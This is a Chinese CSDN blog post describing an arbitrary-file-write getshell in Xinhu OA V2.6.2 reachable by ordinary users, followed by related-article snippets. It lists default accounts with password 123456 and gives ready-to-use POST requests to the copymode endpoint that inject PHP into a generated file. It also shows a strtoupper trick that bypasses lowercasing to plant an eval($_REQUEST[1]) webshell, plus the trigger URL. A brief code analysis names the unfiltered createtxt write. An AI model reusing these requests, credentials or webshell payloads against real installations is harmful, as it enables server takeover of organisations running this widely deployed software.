信呼OA普通用户权限getshell方法

于 2024-03-05 10:43:32 发布
阅读量867 收藏 10
点赞数 3
文章标签: 安全 windows 网络 web安全 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C20220511/article/details/136472171
版权
本文详细描述了信呼OAV2.6.2版本的安全漏洞,包括如何利用getshell方法以及通过构造特定请求实现的任意文件写入漏洞,提醒用户注意更新和安全防护。
摘要由CSDN通过智能技术生成

0x01 前言

信呼OA是一款开源的OA系统,面向社会免费提供学习研究使用,采用PHP语言编写,搭建简单方便,在中小企业中具有较大的客户使用量。从公开的资产治理平台中匹配到目前互联中有超过1W+的客户使用案例。

信呼OA目前最新的版本是V2.6.2,发布时间是2023-12-22。作者整体上保持了较高的系统更频率,对历史爆出的安全问题也及时进行修复。目前网上能找到的信呼OA getshell的办法大多数是老版本或者是需要admin权限的,没有针对新版本进行getshell的思路。

0x02 步骤

本地搭建当前最新版的信呼OA系统V2.6.2,如下图所示。

图片

使用普通OA用户登陆,信呼OA安装之后默认存在账号diaochan/xiaoqiao/daqiao/rock/zhangfei/zhaozl等用户,密码都是123456。这里使用普通用户xiaoqiao登陆,然后构造下面的请求。

http://xinhu.test.com:8890/index.php?d=main&m=flow&a=copymode&ajaxbool=true
POST:id=1&name=a{};phpinfo ();class a

图片

生成的文件访问如下(以下两种方式均可):

http://xinhu.test.com:8890/webmain/flow/input/mode_a%7B%7D%3Bphpinfo%20%28%29%3Bclass%20aAction.php

http://xinhu.test.com:8890/webmain/model/flow/2%7B%7D%3Bphpinfo%20%28%29%3Bclass%20aModel.php

图片

由于传递的参数值会被全部转化为小写字母(下一步的漏洞分析中会提到),导致我们不能在webshell中使用大写字母,所以并不能直接写一句话webshell。绕过方式是可以通过下面的方式来转化一下一句话木马。

http://xinhu.test.com:8890/index.php?d=main&m=flow&a=copymode&ajaxbool=true
POST:id=1&name=a{};eval (strtoupper("eval (\$_request[1]);"));class a

运行之后访问下面的链接,由于链接中涉及到多个特殊字符,如果不清楚应该如何转义的请复制下面的链接。

http://xinhu.test.com:8890/webmain/flow/input/mode_a%7b%7d;eval%20(strtoupper(%22eval%20(%5c$_request%5b1%5d);%22));class%20aAction.php?1=echo%20md5(1);

图片

0x03 分析

在webmain/main/flow/flowAction.php文件中,其中copymodeAjax接收外部用户传入的参数,如下图所示。

图片

继续跟踪createtxt方法,如下所示,仅仅只是进行了文件写入操作,并没有进行过滤,导致任意文件写入漏洞。

图片

盛邦安全
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
协同办公OA系统 v1.8.7
10-02
协同办公OA系统v1.8.7版本在功能上进行了优化和升级,为用户提供更加完善的办公体验。系统内可能包含的组件和功能有: 1. **工作流管理**:强大的工作流引擎支持自定义表单和流程,实现审批、报销、请假等日常...
【内网渗透】春秋云镜Intitle WP
Sapphire037的博客
04-23 2159
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私或评论,接下来会持续更新。
春秋云镜-【仿真场景】Initial writeup
渗透测试研究中心
03-07 1227
开启靶机后是一个带着 ThinkPHP icon 的登陆界面,直接测试一下存在 5.0.23 RCE打一下,PHP-7.4.3 的环境,看一下 disable_functionspcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifco...
文件包含漏洞(一)
不秃头的程序Yang
06-29 1452
二、常见文件包含函数 三、代码分析 四、利用方法 五、本地文件包含 1、文件包含/etc/passwd 3.2 搭建测试环境 3.3 抓包测试 文件包含图片 包含日志文件getshell 包含环境变量getshell
协同办公系统-存储型XSS漏洞
zzf011900的博客
11-11 299
alert(1)
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0
siu~
08-29 1229
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统的漏洞检测和利用,共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.
PHP协同办公OA系统 v2.5.0
10-21
协同办公OA系统是开源的一款办公系统,跨平台的系统,支持APP,pc网页版,pc客户端等。 协同办公OA系统特点: 1、让每个企业单位都有自己的工作系统。 2、移动,免费开源工作系统,数据全部自己管理。 3、...
协同办公OA系统 v1.9.9
08-22
1. 开源特性:协同办公OA系统的开源设计,意味着用户可以自由定制和扩展系统功能,满足不同企业的个性化需求。开发者可以根据企业的业务流程,对系统进行二次开发,构建符合企业特色的办公环境。 2. 跨平台兼容...
OA安卓app源码.rar
05-08
"OA安卓app源码.rar" 是一个包含Android应用程序源代码的压缩文件,主要用于备份已授权的OA(Office Automation)应用的源代码。OA是一款用于企业内部管理的办公自动化软件,它集成了多种功能,如任务...
协同办公OA系统 v1.9.8
10-21
协同办公OA系统是开源的一款办公系统,跨平台的系统,支持APP,pc网页版,pc客户端等。简介:1、让每个企业单位都有自己的工作系统。2、移动,免费开源工作系统,数据全部自己管理。3、自定义管理应用,模块数据,权限分配。4、单据快速提醒推送,重要通知任务及时提醒。5、即时息沟通交流。6、更多的请到官网下载,包括APP,服务端,客户端等下载。协同办公系统 v1.9.8 更新日志:日期:2019-09-231、完善系统安全性。2、系统优化等。3、APP完善会话管理功能。
协同办公OA系统源代码
03-18
协同办公OA系统是开源的一款办公系统,跨平台的系统,支持APP,pc网页版,pc客户端等。 协同办公OA系统特点: 1、让每个企业单位都有自己的工作系统。 2、移动,免费开源工作系统,数据全部自己管理。 3、自定义管理应用,模块数据,权限分配。 4、单
开源oa-php
05-10
这是一款php开源办公系统,有请假、调休、加班申请、上下班打卡,人事管理、行政管理等等强大的功能。
oa_v1.8.1.zip
03-20
oa是一个不错的企业办公系统。通过软件能移动办公,上传并保存办公文件,员工内部交流,发布工作任务等
OA系统开源v1.9.9.zip
01-16
1、服务器选择 选用windows操作系统的服务器。 1、配置要求至少:2G内存,2核的CPU,带宽看自己,低于此配置服务器就比较卡。 2、操作系统版本:建议使用windows server 2012 64位 纯净版。 3、PHP的运行环境:IIS(一般是系统自带)+Mysql5.5以上+PHP5.6以上。 选用Linux操作系统的服务器。 1、配置要求至少:1G内存,1核的CPU,任何配置都可以。 2、操作系统版本:Centos7以上 64位。 3、PHP的运行环境:Nginx/Apache+Mysql5.5以上+PHP5.6以上。
协同办公OA系统
08-18
协同办公OA系统详解》 协同办公OA系统,是一款专为企事业单位打造的高效、便捷的办公解决方案。作为开源软件,它具备跨平台的优势,可以在多个终端上运行,包括手机APP、PC网页版以及PC客户端,极大地...
[代码审计]协同办公系统2.2存在文件上传配合云处理函数组合拳RCE
Y4tacker的博客
07-12 4963
文章目录写在前面漏洞分析脚本 写在前面 本次强网杯决赛的一个题,还是蛮有意思的 漏洞分析 首先这个系统存在弱口令,在题目给的sql文件当中通过在线md5破解得到test/abc123 接下来就是随便找一个地方进行文件上传 我们抓包看看对这个php文件进行了什么处理,其调用了webmain/task/api/uploadAction.php下uploadClassAction类的upfileAction函数 引入插件,实例化upfileChajian类 跳过不需太过于关注的部分,我们跟踪up函数 看看
框架使用
qq_41737353的博客
10-10 674
当前操作人uid获取: $uid = $this->adminid 数据库操作 $res_id = m('achievement_query')->insert(array()); //返回的是新增数据的id($res_id); url对应参数 index.php?a=方法名&d=对应文件夹名&m=模块。 1、源文件位置:mode/bootstrapplugin/jquery-bootstable.js,可以打开看一下源码,别告诉我们对js过敏看不懂,那可以洗洗睡了。 2、
企业OA系统部署
qq_36963043的博客
07-01 2190
企业OA系统部署 5.1 问题 本例要求在虚拟机192.168.10.7上快速部署“协同办公”系统,为下一个迁移案例做好环境准备,完成下列任务: 1)准备LAMP环境,注册本地域名 tts.123.cn 2)配置虚拟主机 tts.123.cn ,使用“协同办公”代码 3)准备专用数据库 oadb,授权用户 runoa 全权访问 4)调整 /var/www/oa 目录的归属,使Web服务有写入权限 5)访问 http://tts.123.cn/ ,按提示安装OA系统 5.2 步骤 实现此案例需要按照如
oa_v1.8.3源码
最新发布
11-16
OA是一款开源的办公自动化系统,版本号为v1.8.3。下面是对其源码的回答: OA的源码包含了系统的全部代码,通过阅读源码可以了解系统的实现原理,同时也可以根据自己的需求进行二次开发和定制化。 在OA的源码中,可以看到系统的整体结构和各个模块的实现方式。它采用了MVC架构,将系统分为数据层、业务逻辑层和表示层。通过分层的设计方式,使系统的代码结构清晰,易于维护和扩展。 在数据层,可见对数据库的操作。通过对数据库的增删改查,实现了系统对数据的管理和存储。数据库设计合理,表结构清晰,能有效地提高系统的性能和扩展性。 在业务逻辑层,可以看到系统各个功能模块的实现代码。这些模块包括用户管理、角色权限管理、流程管理等。每个模块都有相应的代码文件,通过对这些文件的阅读和理解,可以了解到每个功能的实现细节。 在表示层,可以看到系统的前端界面代码。OA使用了HTML、CSS和JavaScript等前端技术,通过这些技术实现了系统的用户界面。前端代码也是模块化的,通过引入不同的组件和插件,可以实现不同样式的界面。 总的来说,OA的源码提供了系统的核心代码和实现细节,通过对其进行学习和理解,可以掌握系统的运行原理,并且可以根据自己的需求进行二次开发和定制化。同时,阅读源码也是学习软件开发的一种重要方式,可以提高自己的编码水平和理解能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值